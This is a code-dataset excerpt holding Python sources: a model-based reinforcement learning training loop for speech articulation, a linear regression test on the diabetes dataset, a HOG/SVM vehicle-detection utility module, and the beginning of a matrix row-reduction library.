sys.stdout = Logger(video_dir + \"/log.txt\")\n\n for episode in range(num_episodes):\n ep_states = []\n ep_states_pred = []\n ep_actions = []\n misses = []\n # rollout\n T = len(env.get_current_reference())\n states = np.zeros((T, env.state_dim))\n actions = np.zeros((T, env.action_dim))\n next_states = np.zeros((T, env.state_dim))\n dones = np.zeros(T)\n\n\n state0 = env.reset()\n state = state0\n env.render()\n ep_states.append(state)\n ep_states_pred.append(state[:-env.goal_dim])\n state = env.normalize(state, env.state_bound)\n\n # axes[0].cla()\n\n score = 0.\n\n self.agent.eval()\n self.model_dynamics.eval()\n step = 0\n miss_max_idx = -1\n terminated = False\n\n probs = []\n entropies = []\n\n reference_probs = []\n reference_entropies = []\n reference_classify_hidden = None\n\n while True:\n state_tensor = torch.from_numpy(state).float().to(self.device).view(1, -1)\n action = self.agent(state_tensor).detach().cpu().numpy().squeeze()\n action = action + self.noise_gamma * action_noise()\n ep_actions.append(action)\n action_denorm = env.denormalize(action, env.action_bound)\n next_state, reward, done, _ = env.step(action_denorm)\n\n # reference classify\n sound_ref = env.get_current_reference()[step, -env.audio_dim:]\n ref_prob, ref_entropy, reference_classify_hidden = env.classify(torch.from_numpy(sound_ref).float().to(self.device).view(1,1,-1), reference_classify_hidden)\n reference_probs.append(ref_prob.detach().cpu().numpy())\n reference_entropies.append(ref_entropy.detach().cpu().numpy())\n\n if isinstance(reward, float):\n probs.append(0)\n entropies.append(0)\n else:\n probs.append(reward[0].detach().cpu().numpy())\n entropies.append(reward[1].detach().cpu().numpy())\n\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(state_tensor, torch.from_numpy(action).float().to(self.device).view(1,-1))\n next_state_pred = env.denormalize(next_state_pred.detach().cpu().numpy().squeeze(), env.state_bound[:-env.goal_dim])\n\n ep_states.append(next_state)\n ep_states_pred.append(next_state_pred)\n next_state = env.normalize(next_state, env.state_bound)\n\n states[step, :] = state\n actions[step, :] = action\n next_states[step, :] = next_state\n dones[step] = 1\n\n env.render()\n\n miss = torch.abs(torch.from_numpy(next_state).float().to(self.device)[:-env.goal_dim][torch.from_numpy(np.array(env.state_goal_mask, dtype=np.uint8)).byte()] -\n torch.from_numpy(state).float().to(self.device)[-env.goal_dim:])\n\n misses.append(miss[:].max().detach().cpu().numpy())\n\n if len(misses) > 3 and np.all(np.array(misses[-3:]) > 0.1) and not terminated:\n terminated = True\n res_step = step\n miss_max_idx = np.argmax(miss[:].detach().cpu().numpy())\n elif not terminated:\n score = step\n if len(misses) > 3 and np.all(np.array(misses[-3:]) > 0.1) and (episode % 10 != 0 or self.replay_buffer.size() * 3 < 2 * self.minibatch_size):\n miss_max_idx = np.argmax(miss[:].detach().cpu().numpy())\n break\n if np.any(done):\n\n break\n state = next_state\n step += 1\n\n\n\n\n if episode % 10 != 0:\n self.replay_buffer.add((states, actions, next_states, dones))\n\n scores.append(score)\n if not terminated:\n res_step = step\n if episode % 10 == 0:\n self.noise_gamma *= self.noise_decay\n\n if episode % 10 == 0 and episode > 1 and self.replay_buffer.size() * 3 > 2 * self.minibatch_size:\n n_audio = 26\n n_artic = 24\n n_artic_goal = 6\n\n # show fully predicted rollout given s0 and list of actions\n pred_states = []\n pred_states_std = []\n state = state0\n state_std = np.zeros(env.state_dim - env.goal_dim)\n pred_states_probs = []\n pred_state_prob = 1.\n for idx, a in enumerate(ep_actions):\n state = env.normalize(state, env.state_bound)\n\n pred_states.append(state)\n pred_states_std.append(state_std)\n state_tensor = torch.from_numpy(state).float().to(self.device).view(1, -1)\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(state_tensor,\n torch.from_numpy(a).float().to(self.device).view(1, -1))\n\n next_state_distr = Normal(next_state_pred, next_state_pred_std)\n next_state_sampled_prob = (next_state_distr.cdf(next_state_pred + self.cdf_beta) - next_state_distr.cdf(\n next_state_pred - self.cdf_beta)).prod(dim=-1).detach().cpu().numpy().squeeze()\n pred_state_prob *= next_state_sampled_prob\n pred_states_probs.append(pred_state_prob)\n\n next_state_pred = env.denormalize(next_state_pred.detach().cpu().numpy().squeeze(),\n env.state_bound[:-env.goal_dim])\n state = np.concatenate((next_state_pred, ep_states[idx][-env.goal_dim:]))\n state_std = next_state_pred_std.detach().cpu().numpy().squeeze()\n\n\n\n\n\n # Share a X axis with each column of subplots\n fig, axes = plt.subplots(9, 2, figsize=(5, 17))\n cb = None\n # plt.ion()\n # plt.show()\n\n\n\n ep_states = env.normalize(np.array(ep_states), env.state_bound)\n im0 = axes[0, 0].imshow(np.array(ep_states)[:, :n_artic].T, vmin=-1., vmax=1.)\n axes[0, 0].set_title('rollout artic')\n plt.colorbar(im0, ax=axes[0, 0])\n\n im0 = axes[0, 1].imshow(np.array(ep_states)[:, n_artic: n_artic+n_audio].T, vmin=-1., vmax=1.)\n axes[0, 1].set_title('rollout acoustic')\n plt.colorbar(im0, ax=axes[0, 1])\n # im_pred = axes[1].imshow(np.array(ep_states_pred)[:, -n_audio:].T, vmin=vmin, vmax=vmax)\n\n im_pred = axes[1, 0].imshow(np.array(pred_states)[:, :n_artic].T, vmin=-1., vmax=1.)\n axes[1, 0].set_title('pred rollout artic')\n plt.colorbar(im_pred, ax=axes[1, 0])\n\n im_pred = axes[1, 1].imshow(np.array(pred_states)[:, n_artic: n_artic+n_audio].T, vmin=-1., vmax=1.)\n axes[1, 1].set_title('pred rollout acoustic')\n axes[1, 1].set_title('pred rollout acoustic')\n plt.colorbar(im_pred, ax=axes[1, 1])\n\n im_pred = axes[2, 0].imshow(np.array(pred_states_std)[:, :n_artic].T)\n axes[2, 0].set_title('pred rollout artic std')\n plt.colorbar(im_pred, ax=axes[2, 0])\n\n im_pred = axes[2, 1].imshow(np.array(pred_states_std)[:, n_artic: n_artic+n_audio].T)\n axes[2, 1].set_title('pred rollout acoustic std')\n plt.colorbar(im_pred, ax=axes[2, 1])\n\n if n_artic_goal > 0:\n im1 = axes[3, 0].imshow(ep_states[:, -env.goal_dim: -env.goal_dim + n_artic_goal].T, vmin=-1., vmax=1.)\n axes[3, 0].set_title('reference artic')\n plt.colorbar(im1, ax=axes[3, 0])\n\n im1 = axes[3, 1].imshow(ep_states[:, -env.goal_dim + n_artic_goal:].T, vmin=-1., vmax=1.)\n axes[3, 1].set_title('reference acoustic')\n plt.colorbar(im1, ax=axes[3, 1])\n\n diff_img = np.abs(np.array([ep_states[i, -env.goal_dim:] - np.array(ep_states)[i + 1, :-env.goal_dim][env.state_goal_mask] for i in range(len(ep_states)-1)]))\n # diff_img_normed = env.normalize(diff_img.T, env.state_bound[:-env.goal_dim])\n diff_img_normed = diff_img\n\n if n_artic_goal > 0:\n im2 = axes[4, 0].imshow(np.array(diff_img_normed[:, :n_artic_goal].T))\n axes[4, 0].set_title('error artic')\n plt.colorbar(im2, ax=axes[4, 0])\n\n im2 = axes[4, 1].imshow(np.array(diff_img_normed[:, -n_audio:].T))\n axes[4, 1].set_title('error acoustic')\n plt.colorbar(im2, ax=axes[4, 1])\n\n pred_err_img = np.abs(np.array(\n [ep_states[i, :-env.goal_dim] - np.array(pred_states)[i, :-env.goal_dim] for i in\n range(len(ep_states) - 1)]))\n # diff_img_normed = env.normalize(diff_img.T, env.state_bound[:-env.goal_dim])\n im3 = axes[5, 0].imshow(np.array(pred_err_img[:, :n_artic].T))\n axes[5, 0].set_title('pred error artic')\n plt.colorbar(im3, ax=axes[5, 0])\n\n im3 = axes[5, 1].imshow(np.array(pred_err_img[:, n_artic:n_artic + n_audio].T))\n axes[5, 1].set_title('pred error acoustic')\n plt.colorbar(im3, ax=axes[5, 1])\n\n im4 = axes[6, 0].imshow(np.array(probs).T, vmin=0., vmax=np.array(probs).T.max())\n # axes[5, 1].ylim((0, 1.0))\n axes[6, 0].set_title('classify prob')\n plt.colorbar(im4, ax=axes[6, 0])\n\n im4 = axes[6, 1].plot(np.array(entropies))\n axes[6, 1].set_ylim(bottom=0, top=np.array(entropies).max()+2)\n axes[6, 1].set_title('classify entropy')\n # plt.colorbar(im4, ax=axes[4, 1])\n\n axes[7, 1].plot(np.array(pred_states_probs))\n axes[7, 1].set_ylim(bottom=0, top=1.2)\n axes[7, 1].set_title('pred state probability')\n\n im = axes[8, 0].imshow(np.array(reference_probs).T, vmin=0., vmax=np.array(reference_probs).T.max())\n # axes[5, 1].ylim((0, 1.0))\n axes[8, 0].set_title('classify ref prob')\n plt.colorbar(im, ax=axes[8, 0])\n\n im = axes[8, 1].plot(np.array(reference_entropies).T)\n axes[8, 1].set_ylim(bottom=0, top=np.array(reference_entropies).max()+2)\n # axes[5, 1].ylim((0, 1.0))\n axes[8, 1].set_title('classify ref entropy')\n\n\n\n # if cb is None:\n # cb = plt.colorbar(im0, ax=axes[0, 1])\n # plt.colorbar(im_pred, ax=axes[1, 1])\n # plt.colorbar(im1, ax=axes[2, 1])\n # plt.colorbar(im2, ax=axes[3, 1])\n # plt.colorbar(im3, ax=axes[4, 1])\n plt.tight_layout()\n # plt.draw()\n # plt.pause(.001)\n\n fname = video_dir + '/episode_' + str(episode) + '_' + str(datetime.datetime.now().strftime(\"%m_%d_%Y_%I_%M_%p_%S\"))\n env.dump_episode(fname)\n fig.savefig(fname+\".png\")\n plt.close('all')\n\n sys.stdout.flush()\n\n # save model\n if episode % 50 == 0:\n with open(video_dir + '/model_dynamics.pickle', 'wb') as f:\n torch.save(self.model_dynamics, f)\n with open(video_dir + '/agent.pickle', 'wb') as f:\n torch.save(self.agent, f)\n\n if self.replay_buffer.size() * 3 > 2 * self.minibatch_size:\n # train nets couple of times relative to the increase of replay buffer\n\n ##############################################################\n # train model dynamics\n ##############################################################\n\n\n s0_batch, a_batch, s1_batch, dones_batch = self.replay_buffer.sample_batch(self.replay_buffer.size())\n\n state_mask = dones_batch.repeat(s0_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n action_mask = dones_batch.repeat(a_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n\n s0_batch_masked = s0_batch.masked_select(state_mask).view(-1, env.state_dim)\n a_batch_masked = a_batch.masked_select(action_mask).view(-1, env.action_dim)\n s1_batch_masked = s1_batch.masked_select(state_mask).view(-1, env.state_dim)\n\n md_replay_buffer = ReplayBuffer(self.replay_buffer.size() * 30)\n\n [md_replay_buffer.add((s0_batch_masked[i].detach().cpu().numpy(),\n a_batch_masked[i].detach().cpu().numpy(),\n s1_batch_masked[i].detach().cpu().numpy())) for i in range(s0_batch_masked.shape[0])]\n\n n_train_steps = round(\n md_replay_buffer.size() / self.minibatch_size * self.num_epochs_model_dynamics + 1)\n\n self.model_dynamics.train()\n for _ in range(n_train_steps):\n train_step_i += 1\n s0_batch, a_batch, s1_batch = md_replay_buffer.sample_batch(self.minibatch_size)\n\n self.model_dynamics_optim.zero_grad()\n s1_pred, _, s1_pred_ensemble = self.model_dynamics(s0_batch.float().to(self.device), a_batch.float().to(self.device))\n md_loss = torch.nn.SmoothL1Loss(reduce=False)(s1_pred_ensemble,\n s1_batch[:, :-env.goal_dim].float().to(self.device).repeat(s1_pred_ensemble.shape[0], 1, 1))\n md_loss = md_loss.sum() / s0_batch.shape[0]\n\n md_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model_dynamics.parameters(), self.clip_grad)\n self.model_dynamics_optim.step()\n\n ##############################################################\n # train policy\n ##############################################################\n\n self.model_dynamics.eval()\n\n s0_batch, a_batch, s1_batch, dones_batch = self.replay_buffer.sample_batch(self.replay_buffer.size())\n\n # calculate probabilities of trajectories\n next_state_pred, next_state_pred_std, _ = self.model_dynamics(s0_batch.view(-1, env.state_dim).float(),\n a_batch.view(-1, env.action_dim).float())\n next_state_dist = Normal(next_state_pred, next_state_pred_std)\n next_state_prob = (next_state_dist.cdf(s1_batch.float().view(-1, env.state_dim)[:, :-env.goal_dim] + self.cdf_beta)\n - next_state_dist.cdf(s1_batch.float().view(-1, env.state_dim)[:, :-env.goal_dim] - self.cdf_beta)).prod(dim=-1)\n\n # compute cum prod of trajectory probability\n next_state_prob = next_state_prob.view(s0_batch.shape[0], -1).cumprod(dim=-1)\n\n state_mask = dones_batch.repeat(s0_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n action_mask = dones_batch.repeat(a_batch.shape[-1], 1, 1).permute(1, 2, 0).byte()\n\n s0_batch_masked = s0_batch.masked_select(state_mask).view(-1, env.state_dim)\n a_batch_masked = a_batch.masked_select(action_mask).view(-1, env.action_dim)\n s1_batch_masked = s1_batch.masked_select(state_mask).view(-1, env.state_dim)\n s0_prob = torch.cat((torch.ones(s0_batch.shape[0], 1), next_state_prob[:, :-1]), dim=-1)\n s0_prob_masked = s0_prob.masked_select(dones_batch.byte())\n\n agent_replay_buffer = ReplayBuffer(self.replay_buffer.size() * 30)\n\n [agent_replay_buffer.add((s0_batch_masked[i].detach().cpu().numpy(),\n a_batch_masked[i].detach().cpu().numpy(),\n s1_batch_masked[i].detach().cpu().numpy(),\n s0_prob_masked[i].detach().cpu().numpy())) for i in range(s0_batch_masked.shape[0])]\n\n s1_pred_log_probs = []\n self.agent.train()\n self.model_dynamics.eval()\n for _ in range(n_train_steps):\n # train_step_i += 1\n\n s0_batch, a_batch, s1_batch, s0_prob_batch = agent_replay_buffer.sample_batch(self.minibatch_size)\n\n s0_batch = s0_batch.detach()\n s0_prob_batch = s0_prob_batch.detach()\n\n actions_predicted = self.agent(s0_batch.float().to(self.device))\n # predict state if predicted actions will be applied\n s1_pred, s1_pred_std, s1_pred_ensmble = self.model_dynamics(s0_batch.float().to(self.device), actions_predicted)\n # s1_pred = s1_pred_ensmble[0,:,:]\n actor_loss = torch.nn.MSELoss(reduction='none')(\n s1_pred[:, torch.from_numpy(np.array(env.state_goal_mask, dtype=np.uint8)).byte()],\n s0_batch[:, -env.goal_dim:].float().to(self.device))\n\n # s1_pred_log_prob = Normal(s1_pred, s1_pred_std).log_prob(s1_pred).sum(dim=-1).exp()\n\n s1_pred_prob = (Normal(s1_pred, s1_pred_std).cdf(s1_pred + self.cdf_beta) - Normal(s1_pred, s1_pred_std).cdf(s1_pred - self.cdf_beta)).prod(dim=-1)\n s1_pred_prob = s1_pred_prob * s0_prob_batch\n # s1_pred_prob = s1_pred_prob\n\n s1_pred_log_probs.append(s1_pred_prob.detach().cpu().numpy().squeeze())\n actor_loss = actor_loss * s1_pred_prob.detach().unsqueeze(1)\n actor_loss = actor_loss.sum() / self.minibatch_size\n if torch.isnan(actor_loss):\n k = 7\n actor_loss = actor_loss\n # study this penalty\n action_penalty = self.action_penalty * torch.mean(torch.abs(actions_predicted))\n # actor_loss += action_penalty\n self.actor_optim.zero_grad()\n actor_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.agent.parameters(), self.clip_grad)\n self.actor_optim.step()\n\n print(\"|episode: {}| train step: {}| model_dynamics loss: {:.8f}| policy loss: {:.5f}| score:{:.2f} | steps {}| miss_max_idx {} | md_prob_mean {:.2f}\".format(episode,\n train_step_i,\n np.mean(md_loss.detach().cpu().numpy()),\n actor_loss.detach().cpu().numpy().squeeze(),\n score,\n res_step,\n miss_max_idx,\n np.mean(np.array(s1_pred_log_probs))))\n\n print(\"Training finished. Result score: \", score)\n return scores","sub_path":"src/reinforcement/goal_directed_model_based_rl/algs/model_based_multi_step_backprop_with_ensemble_classifier_v3.py","file_name":"model_based_multi_step_backprop_with_ensemble_classifier_v3.py","file_ext":"py","file_size_in_byte":24416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"653281705","text":"from sklearn import datasets\nfrom sklearn.model_selection import train_test_split # 留出法\nfrom sklearn.metrics import mean_squared_error # 均方误差\nfrom sklearn.metrics import r2_score # R square\nfrom sklearn.linear_model import LinearRegression\nimport lr\n\ndiabetes = datasets.load_diabetes()\nprint(\"总行数为\" + str(len(diabetes.data)))\nprint(\"特征数为\" + str(diabetes.data.shape[1]))\nX = diabetes['data']\nY = diabetes['target'].reshape(-1, 1)\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\nmodel = lr.LinearRegression(x_train, y_train, 0) # 正则化系数填0\n\nmodel.gradient_descent_fit() # 进行拟合\ny_pre = model.predict(x_test)\n\nprint(\"——自己写的——\")\nprint(\"均方误差MSE为:\" + str(mean_squared_error(y_pre, y_test)))\nprint(\"R方系数为:\" + str(r2_score(y_test, y_pre)))\n\nskmodel = LinearRegression()\nskmodel.fit(x_train, y_train)\ny_pre = skmodel.predict(x_test)\n\nprint(\"——sklearn的——\")\nprint(\"均方误差MSE为:\" + str(mean_squared_error(y_pre, y_test)))\nprint(\"R方系数为:\" + str(r2_score(y_test, y_pre)))","sub_path":"7.13-7.14/LR/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"129651102","text":"import matplotlib.image as mpimg\nimport cv2\nimport numpy as np\nfrom skimage.feature import hog\nfrom joblib import Memory\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom scipy.ndimage.measurements import label\nimport matplotlib.pyplot as plt\nimport glob\n\nmemory = Memory(cachedir='cache')\n\ndef traverse_train_dataset(base_dir, dirs):\n return np.concatenate([[f for f in glob.glob('%s/%s/*.png' % (base_dir, d))] for d in dirs])\n\ndef data_look(car_list, notcar_list):\n data_dict = {}\n \n data_dict[\"n_cars\"] = len(car_list)\n data_dict[\"n_notcars\"] = len(notcar_list)\n \n example_img = mpimg.imread(car_list[0])\n data_dict[\"image_shape\"] = example_img.shape\n data_dict[\"data_type\"] = example_img.dtype\n\n return data_dict\n\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n draw_img = np.copy(img)\n\n for bbox in bboxes:\n cv2.rectangle(draw_img, bbox[0], bbox[1], color, thick)\n \n return draw_img\n\n# Define a function to compute color histogram features \ndef color_hist_rgb(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the RGB channels separately\n rhist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n ghist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n bhist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n \n # Generating bin centers\n bin_edges = rhist[1]\n bin_centers = (bin_edges[1:] + bin_edges[0:len(bin_edges)-1])/2\n \n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((rhist[0], ghist[0], bhist[0]))\n \n # Return the individual histograms, bin_centers and feature vector\n return rhist, ghist, bhist, bin_centers, hist_features\n\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n \n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n \n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n# Define a function to compute color histogram features \ndef bin_spatial(img, size=(32, 32)):\n # Use cv2.resize().ravel() to create the feature vector\n features = cv2.resize(img, size).ravel() \n\n return features\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):\n if vis == True:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=False, \n visualise=True, feature_vector=False)\n return features, hog_image\n else: \n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=False, \n visualise=False, feature_vector=feature_vec)\n return features\n \ndef single_img_features(image, conv=None, spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n\n feature_image = np.copy(image) if conv is None else cv2.cvtColor(image, conv)\n\n spatial_features = []\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n\n hist_features = []\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n\n hog_features = [] \n if hog_feat == True:\n # Call get_hog_features() with vis=False, feature_vec=True\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.ravel(hog_features) \n\n return np.concatenate([spatial_features, hist_features, hog_features])\n \n \n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\n@memory.cache\ndef extract_features(imgs, *args, **kwargs):\n\n # Create a list to append feature vectors to\n features = []\n \n # Iterate through the list of images\n for file in imgs:\n image = mpimg.imread(file)\n \n features.append(single_img_features(image, *args, **kwargs))\n\n return features\n\n \n# Define a single function that can extract features using hog sub-sampling and make predictions\ndef find_cars(img, conv, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins):\n\n img = img.astype(np.float32) / 255\n \n img_tosearch = img[ystart:ystop,:,:]\n \n ctrans_tosearch = cv2.cvtColor(img_tosearch, conv)\n \n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n \n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=False)\n \n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell)-1\n nyblocks = (ch1.shape[0] // pix_per_cell)-1 \n nfeat_per_block = orient * cell_per_block ** 2\n \n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step + 1\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step + 1\n \n rectangles = []\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n \n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64, 64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n \n rectangles.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart)))\n \n return rectangles\n\ndef slide_window(img, ystart, ystop, pix_per_cell, cell_per_block, scale): \n window = 64 * scale\n pix_per_cell = pix_per_cell * scale\n \n # Define blocks and steps as above\n nxblocks = (img.shape[1] // pix_per_cell)-1\n nyblocks = ((ystop - ystart) // pix_per_cell)-1 \n \n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = int((nxblocks - nblocks_per_window) // cells_per_step) + 1\n nysteps = int((nyblocks - nblocks_per_window) // cells_per_step) + 1\n \n window_list = []\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell + ystart\n\n window_list.append(((xleft, ytop), (xleft + window, ytop + window)))\n\n return window_list\n\ndef scale_steps(scale_start, scale_end, step):\n steps = int((scale_end - scale_start) / step)\n return scale_start + np.arange(steps) * step\n\ndef find_cars_multiscaled(image, scales, *args, **kwargs):\n car_boxes = []\n \n for scale in scales:\n scale_boxes = find_cars(image, scale=scale, *args, **kwargs)\n \n if (len(scale_boxes) > 0):\n # Fix np.concatenate() ValueError: all the input arrays must have same number of dimensions\n car_boxes.append(scale_boxes)\n\n # Fix ValueError: need at least one array to concatenate\n return np.concatenate(car_boxes) if len(car_boxes) > 0 else []\n\ndef visualize_found_cars(img, bbox_list):\n draw_img = np.copy(img)\n \n for box in bbox_list:\n cv2.rectangle(draw_img, (box[0][0], box[0][1]), (box[1][0], box[1][1]), (0, 0, 255), 6) \n \n return draw_img\n\ndef add_heat(heatmap, bbox_list):\n # Iterate through list of bboxes\n for box in bbox_list:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += 1\n\n return heatmap\n \ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n\n return img\n\n@memory.cache\ndef train_svc(scaled_X, y):\n # Split up data into randomized training and test sets\n rand_state = np.random.randint(0, 100)\n X_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\n svc = LinearSVC()\n\n svc.fit(X_train, y_train)\n \n return svc, svc.score(X_test, y_test)\n\ndef get_heatmap(image, *args, **kwargs):\n car_boxes = find_cars_multiscaled(image, *args, **kwargs)\n \n heat = np.zeros_like(image[:,:,0]).astype(np.float)\n heat = add_heat(heat, car_boxes)\n \n return heat\n\ndef annotate_frame(image, thresh=0, *args, **kwargs):\n heat = get_heatmap(image, *args, **kwargs)\n \n if thresh > 0:\n heat = apply_threshold(heat, thresh)\n \n labels = label(heat)\n \n return draw_labeled_bboxes(np.copy(image), labels)\n\ndef plot_annotate_and_heatmap(image, thresh=0, *args, **kwargs):\n heat = get_heatmap(image, *args, **kwargs)\n \n heat = apply_threshold(heat, thresh)\n\n heatmap = np.clip(heat, 0, 255)\n\n # Find final boxes from heatmap using label function\n labels = label(heatmap)\n draw_img = draw_labeled_bboxes(np.copy(image), labels)\n\n fig = plt.figure()\n plt.subplot(121)\n plt.imshow(draw_img)\n plt.title('Car Positions')\n plt.subplot(122)\n plt.imshow(heatmap, cmap='hot')\n plt.title('Heat Map')\n fig.tight_layout()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"645440901","text":"import math\nimport copy\nfrom Matrix import Matrix\n\n# This is the simplest algorithm I could find for puting a matrix in row-reduced echelon form\n# I'm sure a better algorithm will take significantly more research\n# TODO: Research if more accurate algorithms exist for row reducing matrix\ndef rref(M):\n if not isinstance(M, Matrix):\n return\n l = 0\n m = copy.deepcopy(M)\n rows, cols = m.size()\n for r in range(rows):\n if l >= cols:\n return m\n i = r\n # Find a row that has a pivot in the i,l position\n while math.isclose(m[i][l], 0, abs_tol=.001):\n i += 1\n if i == rows:\n i = r\n l += 1\n if l == cols:\n return m\n # Swap rows if necessary\n for k in range(cols):\n t = m[i][k]\n m[i][k] = m[r][k] \n m[r][k] = t\n # Get the pivot value\n lv = m[r][l]\n # Divide pivot value to entire row, will cause pivot to go to one\n for k in range(cols):\n m[r][k] = m[r][k] / lv\n # Zero out everything underneath the pivot\n for i in range(rows):\n if i != r:\n lv = m[i][l]\n for k in range(cols):\n m[i][k] = m[i][k] - lv * m[r][k]\n l += 1\n return m\n\n# I haven't done research on how this algorithm can be made smarter.\n# There are likely early outs and assumptions that can be made on the matrix.\n# TODO: Research more ways to determine rank of matrix\ndef rank(M, is_reduced=False):\n if not isinstance(M, Matrix):\n return 0\n # If the matrix is indicated as already reduced don't do the work\n if not is_reduced:\n rrefm = rref(M)\n else:\n rrefm = M\n rows, cols = rrefm.size()\n l = 0\n r = 0\n for row in range(rows):\n while l < cols and math.isclose(rrefm[row][l], 0, abs_tol=.001):\n l += 1\n if l >= cols:\n return r\n # Navigate up to the first non zero, this is the pivot point\n r += 1\n return r\n\n# This will calculate the free variables in a matrix, the free variables are\n# defined as the number of columns, or unkowns, minus the rank (pivot variables)\ndef nullity(M, is_reduced=False):\n if not isinstance(M, Matrix):\n return 0\n return M.cols - rank(M, is_reduced)\n\n# Helper fucntion for lu()\ndef __ludot(length, U, L, i, j):\n val = 0\n for k in range(length):\n val += U[k][j] * L[i][k]\n return val\n\n# This function will do the 